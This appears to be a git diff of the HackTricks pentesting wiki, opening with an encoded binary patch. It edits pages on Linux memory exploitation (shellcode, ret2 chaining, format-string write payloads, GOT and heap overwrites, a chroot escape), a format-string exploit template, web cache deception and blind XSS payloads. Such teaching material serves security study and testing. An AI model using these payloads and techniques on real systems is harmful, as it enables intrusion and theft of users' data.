zj_k1YWZ4?kbM`eGxd_Gw2A*@l61(3aN?aK#;u>U#{zSes3n(Cu%X-goP1RFoPOjCX z=SH4c*EFCU@?-~%G*o)W%0kscR1>ra-t*f(gZ&my5M6}lc^Pz6y7`q{~%+LV;Fbp}&N$ad9fN70ZB;1t;^Y!;oJ*`S2O z7yAA)A!@$VPu%Gres9=3;(sFoZOaQzuo5Z}6Z>yPk82i+tVjlS_qXOcUv2qryUj`< zjm+F%);`Sv8|;-weN{SV3yCujxhok%m?IoZRAe_5ir7Wnz=OkoWlxRzX(_vjw~i`3 zfJ?F1Ph_>ZR=tK-xOZ_x0+4CJV-1yMz^7u8(?=3PoNW8>p*(B#G`iSgY9#yXY93m) zo|_4W%d%gAksz(Ck;cmoc`Bi+@k&n16UKk!3PL=SCMt~zHQhHE^(qqO5fSJ2;R++H z-;(AU0z#DGKt{w5sc@}t7bdvm@k_sG9{RG``SR6*#f)ZBgEp5_T{uGc4)XZu=w#u- zIf%bgE&xCKQoJjYrprKwPhTJ+zQoiAjwFt{63kGDWitmSAkY@!RB9N(N9HJ2K5YX!-cWG1j^Czn&4QJdA(w+saX~Bh2FL zlZ0tf{|Lz(nB{cCKg1sk;TZy`z)7|g;RHBT2*6P48IZk%GMFs>7S6{0_pZ$BPzw21l-AxaSr(O>{ttt^l!pJ^U0^Zd%RGQM9vB4Tvanav z`%aUABt2nmqo@4H$>vzXS74s0Fy||c+TZ`Dtg{Sjv+3G(TdWj!x8UyX5ZsFeDH^o6 zyAy&FBzP%KfuhAJUc5*tR@|Y*okHPDpXYtQz4x*I<;UdCk(o8KX4YKib(=-lY|`1E z-vhE*fbG~R`zh&}VY8)7AZoGDPg8s4o40Wc64oy0GRVrL7n>gy&a&XHL;IT|>Ke=^ zKVh@{c;b7uI=lTQ6nySM#*}P_oI4V)EIz@zlwj=Bx!UPYvb7I{qe1&vKr!}5C6z$C zXhvcPJCx!5+W8-ms~hL#&$2=k6EaC~q|_9*?6E1h9WGriR{q9{FhyLGq|Vi-WnNnV zny;(bpw_*R6{vdIxv`L6V(D=I_a78c5Ps{$BeMO5S4d zji{!N!KNp(Ma;Aj_Z`}FP$hF7j9N;u_$p!7&CzV`)4nN?($IIo{N#n_!~+K!Tu4~H zEq`dg^^QX-F9mt@gy||>9Vqxmpu=4VbV2l`{0|ux{Bn6UY;{UWl2=ml3}jE9mO_^d ze>n#mApvIcCDPi)I^$vHp@vJgLQep`JEzwyi3QasO4x@q+Fzl_bH6dByjw&epGZ@* zZGJ%HytqyAlQ82^VEWv>d<&=_2PS6wSsUs6GYNf^K@9CE@dpaWBW^F!`uhk%;gIGi zIyJ#;b&s6#Q(+^{{%wMJ;~bUAxg1yb!LbLGJS!7`joCvhh;#yKndafW z4!3GcsIsyjNhN;^nWDM`#V2OSPx&r59X?R`xgClQ#Hg~SEI3MgN6{QXLuvIQnn{g* zlTU2D@=0&|h4vTvj~`tVaA#44OctK!CUYyI(!7fp{-af20;c_aYIt%aDJv6EB_z9f*rb<6dp9?zrfsunV7>8%Mp+sFrI>rjUku! 
zBxob_eOfW|Ur1vo3(I7<9K|`(X-Wa80or)&4(e4bbN1$=&=f;eQz1%ca2BZcy&Kg= z$)|vk^4tG-l!r77AQe_RMmcMXwu@Hd@%9}x7E+%@MlMb*SkrD_1{z7MzA1`2c&%W~ zt=H{?KktUK=VvP~Hz4>ngt|t(&hjwoSfoW1O=B#zp229O+&o!jrgZ~8h>n`|jiBC_ z)faiR%WPR3A(cUq=Q{vV7nfPc!wppdScuvc&V#-~U)J=8TW@Q`T}5sZgku$7_lrMR z>cPF@BCtIgN*k}{!^6#%j!?}`VSZPOQaNAaP#96sg1Q7+SG8-wdXfC zTH&&lioj)wpb)g4k2gF9RkBgl&*GD$pFR4a2d9HY#*%nXo{$h$33Or&1HxpU$*HH_ zJj!}dX#N&vEuANu5$F^t>`9|+s0=qcQ&~N3SCS=}mNr$nUs{9*MUju09va$dU7Py9 zh6kKs5;18{mKj?WsU>@%Md!@tVi8DqhGTM|OorWFQ0one>E}Bfu8KiKgvCF+o2|*TCX>eCe{Sz0WhK68Bk`WAvwynI04?cs=FP6qaLCGY;2x1_1>$Ce3 z-@-;?I(@L5jt}~^59_c)ogoVVn$wa&cX7H{rz__iXsLd zq06>eZN@|h-&1hbNC%3j>BGD28*dHiDjrH`LRfn<9=z)_6Bk zq5m)@i?JT4eA9+6_P&6YwJ4@~@X?d9aih612nbQWeb`8+wA>XJ;(fIhFt`;t+jePM z+50K=7p);XkEbGzg*%&+Nj3y)J6}W8k3YBZRk|%dRVpiaj_M)?8PshKler*8AXsc5 ziZC8U4Lxo1oaM6Q&Q-=Sl?-VJJYC1Vo28uvR%{Osjwkcn72m^Lcz9lBVvJ4kGTr=N zy^jhXzwOtP|LA?P9o%m%oUyye!0V&tWeOXleKD!wlJd@^OX7G1HIw}x4~T(Htic@l ztEQ88@lEdQ=b0FLM8NH?^Oz`M+RCTboln20)(2TT|ETk-yLijvOHTF%wFX0{axUP< z%s0y@K*F@MW6AaMQc+x$E0&N0l0*Mr^vgXoeud?)toVFix03y}hA`w$qdTt0E6=U9 zJSh=z431G9oH;F5_Cqi)PZlw>o!=8S#9g0-9`#>RvNOb~OI$2En@aPb*#1ks#8aJx zDsQbV#Lq~lF8JRbt|C#Iq&)w?hK5whrnA4l0Mfah&|nL-t-*p-I$3_a^P+JGe6$f-2|^-jdi^P7 z-&V&~{$GCPl)?P9TRI=bPXTge%nL-w@It;EtuD0djxh!710CP^rMtRmb?Yi>pL2nJ zYRNdvoK`h{$Gv*Y=c7<%1aw)6u8~AU@7;qj7yK|aTBFylIS{`^S;u3f=*VhOh^6!3 zmQm>Y%4T;deIS^=9;`UKQ`|;Jfp(93n$QQ)-&XcvrK$luZl_)sej!+dT#3Ci7p1V1}^FFBGF#YcIn;pjV*t9N_L%iZfg0r9VSHBXmYOt$ANW)|_ zExu)ek`}X+gd{QEG{5`$koWL$Bhj8ahAY;d43MD-VR)dh{w-z!!SF1L3SgjnrM?Nr zz2J}v!UPnRZT-jk0;}6vq=i=pOqMXK3o}@EUcDrMewIhZ(-_a4bcK9b(Eh?BzdTwxZbM zZ(6-*H(?awqf~J9$*-CD2oic6f+?`Pavi2z&O>25V@(?eP`!PTM=KXrMBZ+kv^Zr? 
zf=!e~`}Oy;-O5SJVNx9Zli>8lDJgr2qgXyh*D=koPq!wYQff(&uLhWaIHZxv8APdB zScoQnAt31z0B>S=`;%GLV1ASh-;fjO8-u+U0Iu^Z&KWJj*Z~mQ$~IG$>KHB%(mYI* z{>;dq-l=%6;~9PV`=xISXjXsx*C%}0wRpv4Yr7LNy= z>~%!E6k>iKVLm0(m*$TxL77RgUT67Jh+qT?EM!$ZL6C{v5GV?e5FG+5;jAvQtzN3n%{;Wc64-L6!Xw6TV@C zBlRxz))^a-)}+XCHp#<);u(nR<@48fc4E*OA6;8{wFuPLD8hL*|1eOFtz#s)nSM4x zpGqib^)bWS8}P1qbKfV8L@#S2?^L|CpxxBz`YQjsslSlyM)+`Nayr9~P=*D{AScw0 zhrq)qCGoDEojp0BWNqk5H3D0!H23vjH@-gkQm@op3|C|%JUI{fR}vzU;d~cI6MN|_ zjX>p-&m;x4;J&=DmoVABsgc_`4w&W(*r84vc2$J#zyac1NGND274(nRYdSi+-ogEa zW6@pVOWhYXQeMwtc>;(SaWUHqd-?o>36`kEo!Z4I9@CtWq_%JE;2^yr>%~Ub9vXdn zqNgoKXLqX{F5X$ck+h3h433tQT%la#>Bfn+ZO2t~9;2KLa5}Uja`AX*&y#M46Hh45 z+v-AWG{KO?P&DgI*$?K-guRTE#I3%?yeG(GaI8R(Q}kKm&) zZp^Eq5>YF|gL^fk_KoD(|9|jS={RJ!x=Y)>33tgrC&hhKE7IfAn;CkWs`X4;@);Z7 zvO(84@3>-DS|bn)rF6?iQi~BUqFI&bY_J;JHne~ z8pxRsVkWp}ctEggmsG@0A|Hugzd=1muBwc)!+X{qhf{W=WSdUBxlB?K#78+eDrdSZ zvlD7+T{KBp&srx|eGbw){)}N7ib0P!(Tq2`y(eq^)HZ}s@18k(6BNZ5co38$TMVbJj;>6VXUb>u5#&sh zSk{K%h*8ZG;Lb31m0OHf$*A3_FM8ClTq}$^4etUOa#;UnhyP0N5Zj3#%ueCPv#58Y zQrhseOUkIiKomVz>o)fKsd|_uVN(*K#Tdo=u^d#5Gx53v(8BJUDj=RG(L&Pr&!gK% z^3(N8a>8%#*re_11qslU6bc(~gzJ|df(Sh-+CD~(xC}b+)prR|rxA=Rdm-^BE~+#4 z$Bzy3tsMI?u0i`42#Q#TTPP>a1o9X)RSU;sy1y$HH;bTFDK4fQ+k=d2`;AHoF2YcJ z7}_J1lf6cRM9gXwEETv;<@n$v3)*n!{&hn7>LjyvY{^m2=}tzZ6P$WWrvhNmnH;st zWV23o66AzE*j)vCw;#!6EXD3AG;nW|QUNw})@?11-!LiDkn7a9>nsOlIDbh_i)>}3 zNBf?Rtrpozn@|>60UHG`Wt;E{S#nyuw(giPBJKoaSXzOr6_g*Qcp9#Zy%Tu#Yw=xv ze*Vg$`dsj$o=#)hyW{MG$Ey?ZKMziwuQDTcYv;QL)7KAHX53t?Mdv2CdLc$#yyO9p z^*h~!xjl4!e|)88E*bxnE8R|4vRia?!8#X2EM|0b_l1ZEmNF#qT_jSjK-N{bS6v4jTG?{MGin+H)u#8+zZY8 z#!_ua!```@LW}wj%56Q4+Mvo70L3Y;mato+tNV%2+=Y3!>@%reQY`olefg8j-dB*@ zOaSYj0_@`Wc8W&hx{G*>+lSI4P*XKVRp9;EN~!tTViKzBq&!i(S@%m!>Vcf>G`G8} zj?;by4t9VwX?~!-kWBNt(2Qj zZI#n)A{gf#5&mMGMKASsdiwCFi|3S84+*UMfudq&Z?HFc_nVob&^ADh-`Yv=KBWZ+ zpa{t6;4M3J*>qh*$sSbz&U1t#CCF4sH1nfuaxx=z;D0 zZElR?pgZ! 
zWhNciOTzU=9Pg&VK*0|ncPDc3BUa@1soq0FAih*rG2#5k9f>JW)uim%XM#FDX|%LG zv)6mXnkTnvMKQ8D8Li^s!UW6KkG$C~?8( zHnb}0Lea@l)?Rl-A-y92PXqkrqDRyS#G~}I%7Q#YF=`BO@HWq#O1&Tvpa&UnzgK#AF<9{dMcK$qnf2G0am{CvquIo@kf_x z<{eVyjLi|r3U?O|hBS%Iz=W>Iu-6J2$Z0(z=;wtGy%wMPzUWHO0mA#pwRVbcI2_N` z_vC;@yWfkQWk!^C3AX#~m$bnrcFMrRBF3V<xO!nJ+F0VY4Hu6NpfYO%0J2<9FoDQO@$krn>COvrVGEh;Bv@BEQ0U(l zeW*oNNQ%IyikJaXJOBU~6`IHJ)YIOxrTB%;JraLtK|IrKtOp9MGl1GujE*j>2vbK?^#madfevU zk*8h-va1;cHt&XM^p%xm?9-Gq;o_Y(WX7(GbZH0a;5Kbd)#L>D;YQ&(6LtT0PM9`W zo?P4RBko%RZ9H@hp>g<8{BTU3>Ft%Z22YHNP=fD$tPh#zv^Gs*9MtR)HBdSldOI9u zdjUdDK_ftPT-vS`ba|R}b;ZMB-VDIY^+=7vc|ioQl2u*&IR);=T{51kbfcl3e*wT| zJ18us=4NHa^KWehB)2&WK7%9ZLI81_kAyi|A%xh4s<1$Uq%EUw2( zCkb^_w+=~n(J%Hlb$@%f5b3HpBZ1+9<;w|*$93J;pu-SB*^y|B!;KWIt(A}>^X9*C zHwXkWhsu8sEr9xsgrOK}4B9th7;pCi87X$R!F&=mdWD`A4FM?z%^1fuPd!E%%<<3< z7WrI@JcMmYz^JaDWEYXUGxyFYCsrM29=oD%<0qzVEHEHOiN0(I+ zH)rZz38u0_V|A@O#lFw-)Q3hqvKy~?8s0qRu!-18j1K$6z%$k4K0vit)*+J24_nNE zew3J>unp@TfDFisZuc43C1v6k1$SBQ4TZwN0Gi5?Xq;Jy>^~hZd-u2Fv0@P&|II8+ z_GdQ-fRcPC+cfU-Fe7JMHkbZv1o8>5I9JHB^GbJH{jE&gxM550-0d3AFr>HTHxu6b z7dsi*Au%4C3=G?scUOc3kAssf zfSZ{PF$YFmH5uw38&8aHe7D_Iq_Y_D_2(jCSkLsUa;8({#(bbMG`s z9BmBhlov|v9aJVSLsvoiqr+Y?;$vVwD*CarbM8a!TMAPV;L+umXO5$c+WNuUU` zT|e4f8`P~~qj#s2RDYfwhP9Un6E+bDbjcVC6#>h00gSi%$_W8QM4HzmC)Wh==etFP zQb|By#H{&ah(Y3S?)aC?NC7`vXziw(pPj$YQ;tZ(x(l3wukAAZXn52CvkXI`oqu7a zV!cr(t&q8s+;3@Ml>a)>`1fzbw}{6tWu}_8I#z1q5E^@ zC-)AshzY?m9CkUb7L$C#32qi7sV^d^wd=kPiXinKeJW|@K| z?`s!LPB1OE!j|88F6@ihpIEFZA3QOmPwl`L=AhT6UKV&{;E)%Yc0g*BG`i-G<@4^@ z#IdW=481vT!^#_dQwyep0j+DdeBN?W5i%RHw||)M3W@d^7>YRwY#KHSC-A|b#-5Rg zqeZh@9RmXPC;mw;a-qd3t2ESOL^ORAaT-{cdVd@YUu<0nCKOfxFFK`X6&YRx7l2T`*#y~94z zG^TW0_81*zc4y|Rt;q2%fr>=t$$9YGjZq1WsI@XZcJ&WJLf)A|`iKW)WYECSGr+Qn zOrLh%?`jQ^F1l$bT%V3Wnw{)n7~LV?g})fGKU{7}HCT2o8Gafw{X0@w(EZu&^{X{4 zAcv5#lb=kQMAkl7KDU_gTII7_OK4m~jjMLuHrDq1S6v;9ep-s3>Su|~bPCrYpBDCs zF!RXzzFd^QH+8cAYzkNkp5<3MKCW7JBP8L4cCTq~A05AEp<0L=M?<#drh60fiXekC|ePu<=|ImN91h{yyJ2dS1zK4PX?JOM{J2EEXD2b%Y=Y%!bGozpw 
zui+9&gS9hauWz`YYKb&M)vi5weuwm)kF`QctIR9mP_V>w$jjnvQrELhBcNYq#&1$r zf0lPcAO)dRSHw;tb6#;&i8~3AyzNEziBex`9jY>oa(msO2w*)X;)#-djN+WeDBZdS}iRC!iD?DDf>zS2n5hEb4#cj0@)yfg+@3(+*xKHbx zFbB~5eDb@wv$)Z`$kg4Y*1!>j3p{f`t;zH8U zUCT>0+r0QIx2EXCjUVG?Zt**QmT+z|GEawnEI^W>XqxzgOzUV+@$C7XvF=cA=0kDnJ2Iv%FLVY2wodLh1PnFaSDBQV~bgC7rY%aG2cAA zyAbi*)HuwkT8?A#TXoDVYz<+!0{|K7kC=}Y7-o)vh29)4q|Sp~n1Q%Tl%SWIjnU}C zF~xk^l^(CNubl`#JQBMwzDLnWci1rFHqYFAT?Y)B%r*N%E7g8U|IXQWR06L(hH|pU zvwg9dE>fhy8HL#UQZWlND`t=xHN4;{G3G~&;?{$=-y_EQw`q-vGpV;CV7|Z^v%CSa zL)WjmpR2h4yest-oS_L_<6Vz}F^eKz6`=L^9Rc(7AnDJ~`F~RIcGRO_&6awIsRKhK zBfchba;Q_eeC$Mu3BAQCzi%$wf>6}g{qiyOHS%b_R​ ``` -**EJ usando el Stack\(/bin/sh\):** - +**EJ usando el Stack\(/bin/sh\):** ```text section .text @@ -182,7 +179,7 @@ sc: ;Aquí va el shellcode ``` -1. **Atacando el Frame Pointer \(EBP\)** +1. **Atacando el Frame Pointer \(EBP\)** Útil en una situación en la que podemos modificar el EBP pero no el EIP. @@ -232,7 +229,7 @@ De esta forma el EIP se sobreescribirá con la dirección de system la cual reci Es posible encontrarse en la situación de que algún byte de alguna dirección de alguna función sea nulo o espacio \(\x20\). En ese caso se pueden desensamblar las direcciones anteriores a dicha función pues probablemente haya varios NOPs que nos permitan poder llamar a alguno de ellos en vez de a la función directamente \(por ejemplo con > x/8i system-4\). -Este método funciona pues al llamar a una función como system usando el opcode **ret** en vez de **call**, la función entiende que los primeros 4bytes serán la dirección **EIP** a la que volver. +Este método funciona pues al llamar a una función como system usando el opcode **ret** en vez de **call**, la función entiende que los primeros 4bytes serán la dirección **EIP** a la que volver. Una técnica interesante con este método es el llamar a **strncpy\(\)** para mover un payload del stack al heap y posteriormente usar **gets\(\)** para ejecutar dicho payload. 
@@ -249,9 +246,10 @@ De esta forma se pueden encadenar funciones a las que llamar. Además, si se qui Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecución de varias funciones a través del EBP y de "leave;ret" -RELLENO -+ Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: \(&system\(\) + &leave;ret + &“/bin/sh”\) -+ En el EIP ponemos de dirección una función &\(leave;ret\) +RELLENO + +* Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: \(&system\(\) + &leave;ret + &“/bin/sh”\) +* En el EIP ponemos de dirección una función &\(leave;ret\) Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP\_falso + &system\(\) + &\(leave;ret;\) + &”/bin/sh” @@ -273,7 +271,9 @@ El exploit quedaría: SHELLCODE + Relleno \(hasta EIP\) + **&ret** \(los siguien Al parecer funciones como **strncpy** una vez completas eliminan de la pila la dirección donde estaba guardada la shellcode imposibilitando esta técnica. Es decir, la dirección que pasan a la función como argumento \(la que guarda la shellcode\) es modificada por un 0x00 por lo que al llamar al segundo **ret** se encuentra con un 0x00 y el programa muere. - **Ret2PopRet** +```text + **Ret2PopRet** +``` Si no tenemos control sobre el primer argumento pero sí sobre el segundo o el tercero, podemos sobreescribir EIP con una dirección a pop-ret o pop-pop-ret, según la que necesitemos. 
@@ -420,9 +420,9 @@ If HOB < LOB If HOB > LOB `[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]` -HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\_LOB +HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\_LOB -\`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\` +\`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\` ### **Format String Exploit Template** @@ -441,8 +441,8 @@ objdump -s -j .fini_array ./greeting Contents of section .fini_array: 8049934 a0850408 - -#Put your address in 0x8049934 + +#Put your address in 0x8049934 ``` Note that this **won't** **create** an **eternal loop** because when you get back to main the canary will notice, the end of the stack might be corrupted and the function won't be recalled again. So with this you will be able to **have 1 more execution** of the vuln. @@ -473,7 +473,7 @@ Nowadays is very **weird to find a binary with a dtor section**. {% endhint %} The destructor are functions that are **executed before program finishes**. -If you manage to **write** an **address** to a **shellcode** in **`__DTOR_END__`** , that will be **executed** before the programs ends. +If you manage to **write** an **address** to a **shellcode** in **`__DTOR_END__`** , that will be **executed** before the programs ends. Get the address of this section with: ```bash 
@@ -488,7 +488,7 @@ Usually you will find the **DTOR** section **between** the values `ffffffff` and Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to. For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow. -### **\_\_atexit Structures** +### **\_\_atexit Structures** {% hint style="danger" %} Nowadays is very **weird to exploit this**. @@ -653,7 +653,7 @@ So what's the **bypass**? The typical bypass I use is to just don't write to mem Note that in order for this to happen the binary needs to know previous to execution the addresses to the functions: * Lazy binding: The address of a function is searched the first time the function is called. So, the GOT needs to have write permissions during execution. -* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. ``**`-z relro`** `y` **`-z now`** +* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. ```**``-z relro`**`y`**`-z now\`\*\* To check if a program uses Bind now you can do: 
@@ -663,8 +663,6 @@ readelf -l /proc/ID_PROC/exe | grep BIND_NOW \*\*\*\* - - Cuando el binario es cargado en memoria y una función es llamada por primera vez se salta a la PLT \(Procedure Linkage Table\), de aquí se realiza un salto \(jmp\) a la GOT y descubre que esa entrada no ha sido resuelta \(contiene una dirección siguiente de la PLT\). Por lo que invoca al Runtime Linker o rtfd para que resuelva la dirección y la guarde en la GOT. Cuando se llama a una función se llama a la PLT, esta tiene la dirección de la GOT donde se almacena la dirección de la función, por lo que redirige el flujo allí y así se llama a la función. Sin embargo, si es la primera vez que se llama a la función, lo que hay en la GOT es la siguiente instrucción de la PLT, por lo tanto el flujo sigue el código de la PLT \(rtfd\) y averigua la dirección de la función, la guarda en la GOT y la llama. @@ -673,7 +671,7 @@ Al cargar un binario en memoria el compilador le ha dicho en qué offset tiene q Lazy binding —> La dirección de la función se busca la primera vez que se invoca dicha función, por lo que la GOT tiene permisos de escritura para que cuando se busque, se guarde ahí y no haya que volver a buscarla. -Bind now —> Las direcciones de las funciones se buscan al cargar el programa y se cambian los permisos de las secciones .got, .dtors, .ctors, .dynamic, .jcr a solo lectura. **-z relro** y **-z now** +Bind now —> Las direcciones de las funciones se buscan al cargar el programa y se cambian los permisos de las secciones .got, .dtors, .ctors, .dynamic, .jcr a solo lectura. **-z relro** y **-z now** A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles. 
@@ -689,7 +687,7 @@ strcpy\(but, source\); La identifica como insegura y entonces cambia strcpy\(\) por \_\_strcpy\_chk\(\) utilizando el tamaño del buffer como tamaño máximo a copiar. -La diferencia entre **=1** o **=2** es que: +La diferencia entre **=1** o **=2** es que: La segunda no permite que **%n** venga de una sección con permisos de escritura. Además el parámetro para acceso directo de argumentos solo puede ser usado si se usan los anteriores, es decir, solo se pueda usar **%3$d** si antes se ha usado **%2$d** y **%1$d** @@ -717,7 +715,7 @@ Para las funciones que usen el EBP como registro para apuntar a los argumentos a #### **Jaulas con chroot\(\)** -debootstrap -arch=i386 hardy /home/user —> Instala un sistema básico bajo un subdirectorio específico +debootstrap -arch=i386 hardy /home/user —> Instala un sistema básico bajo un subdirectorio específico Un admin puede salir de una de estas jaulas haciendo: mkdir foo; chroot foo; cd .. @@ -732,16 +730,16 @@ Insure++ **Trozo asignado** -prev\_size \| -size \| —Cabecera +prev\_size \| +size \| —Cabecera \*mem \| Datos **Trozo libre** -prev\_size \| -size \| -\*fd \| Ptr forward chunk -\*bk \| Ptr back chunk —Cabecera +prev\_size \| +size \| +\*fd \| Ptr forward chunk +\*bk \| Ptr back chunk —Cabecera \*mem \| Datos Los trozos libres están en una lista doblemente enlazada \(bin\) y nunca pueden haber dos trozos libres juntos \(se juntan\) 
@@ -948,7 +946,7 @@ Si modificamos el size para que de 16 en vez de 8 entonces: fastbin\_index\(\) n
 Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET
-Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0.
+Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0.
 El **av->max\_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones.
@@ -1004,7 +1002,7 @@ Es importante saber que el size del nuevo trozo wilderness sea más grande que l
 Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado.
-Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max\_fast \(72normalmente\) y menos a MIN\_LARGE\_SIZE \(512\).
+Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max\_fast \(72normalmente\) y menos a MIN\_LARGE\_SIZE \(512\).
 Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo:
@@ -1052,7 +1050,7 @@ Consiste en mediante reservas y liberaciones sementar la memoria de forma que qu
 **objdump -d ejecutable** —> Disas functions
 **objdump -d ./PROGRAMA \| grep FUNCION** —> Get function address
-**objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes
+**objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes
 **objdump -t ./exec \| grep varBss** —> Tabla de símbolos, para sacar address de variables y funciones
 **objdump -TR ./exec \| grep exit\(func lib\)** —> Para sacar address de funciones de librerías \(GOT\)
 **objdump -d ./exec \| grep funcCode
diff --git a/exploiting/linux-exploiting-basic-esp/format-strings-template.md b/exploiting/linux-exploiting-basic-esp/format-strings-template.md
index 3bb3e237..87f07f45 100644
--- a/exploiting/linux-exploiting-basic-esp/format-strings-template.md
+++ b/exploiting/linux-exploiting-basic-esp/format-strings-template.md
@@ -60,7 +60,7 @@ def connect_binary():
 def send_payload(payload):
 payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
 log.info("payload = %s" % repr(payload))
- if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED. To mae it shorter consider changing the c% for x%")
+ if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
 P.sendline(payload)
 sleep(0.5)
 return P.recv()
@@ -86,7 +86,7 @@ def get_formatstring_config():
 if b"42424242" in recieved:
 log.info(f"Found offset ({offset}) and padlen ({padlen})")
 return offset, padlen
-
+
 else:
 connect_binary()
 payload = b" " + payload
diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-unix/linux-privilege-escalation-checklist.md
index f8ba4a81..280662e9 100644
--- a/linux-unix/linux-privilege-escalation-checklist.md
+++ b/linux-unix/linux-privilege-escalation-checklist.md
@@ -154,7 +154,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
 If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
-![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png)
+![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)
 ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
diff --git a/pentesting-methodology.md b/pentesting-methodology.md
index 3bfee491..743accf7 100644
--- a/pentesting-methodology.md
+++ b/pentesting-methodology.md
@@ -18,7 +18,7 @@ If you want to **share some tricks with the community** you can also submit **pu
 ## 0- Physical Attacks
-Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](physical-attacks/physical-attacks.md) and others about ****[**escaping from GUI applications**](physical-attacks/escaping-from-gui-applications/).
+Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](physical-attacks/physical-attacks.md) and others about **\*\*\[**escaping from GUI applications\*\*\]\(physical-attacks/escaping-from-gui-applications/\).
 ## 1 - [Discovering hosts inside the network ](pentesting/pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
diff --git a/pentesting-web/cache-deception.md b/pentesting-web/cache-deception.md
index 38015d3d..ce24c54c 100644
--- a/pentesting-web/cache-deception.md
+++ b/pentesting-web/cache-deception.md
@@ -9,7 +9,7 @@
 ## Cache Poisoning
-The goal of poisoning the cache is to make the clients load unexpected resources partially or totally controlled by the attacker.
+The goal of poisoning the cache is to make the **clients load unexpected resources partially or totally controlled by the attacker**.
 The poisoned response will only be served to users who visit the affected page while the cache is poisoned. As a result, the impact can range from non-existent to massive depending on whether the page is popular or not. In order to perform a cache poisoning attack you need first to **identify ukeyed inputs** \(parameters not needed to appear on the the cached request but that change the returned page\), see **how to abuse** this parameter and **get the response cached**.
@@ -91,9 +91,11 @@ Learn here about how to perform [Cache Poisoning attacks abusing HTTP Request Sm
 ## Cache Deception
-The goal of Cache Deception is to make clients load resources that are going to be saved by the cache with their sensitive information.
-A very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).
+The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.
+First of all note that **extensions** such as `.css`, `.js`, `.png` etc are usually **configured** to be **saved** in the **cache.** Therefore, if you access w_ww.example.com/profile.php/nonexistent.js_ the cache will probably store the response because it sees the `.js` **extension**. But, if the **application** is **replaying** with the **sensitive** user contents stored in _www.example.com/profile.php_, you can **steal** those contents from other users.
+
+Another very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).
 In the example it is explained that if you load a non-existent page like _http://www.example.com/home.php/non-existent.css_ the content of _http://www.example.com/home.php_ \(**with the users sensitive information**\) is going to be returned and the cache server is going to save the result. Then, the **attacker** can access _http://www.example.com/home.php_ and see the **confidential information** of the users that accessed before.
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index 7b392a2e..03409a80 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -837,6 +837,8 @@ There is **C2** dedicated to the **exploitation of Service Workers** called [**S
 ### Blind XSS payloads
+You can also use: [https://xsshunter.com/](https://xsshunter.com/)
+
 ```markup
 "> ">
diff --git a/pentesting-web/xxe-xee-xml-external-entity.md b/pentesting-web/xxe-xee-xml-external-entity.md
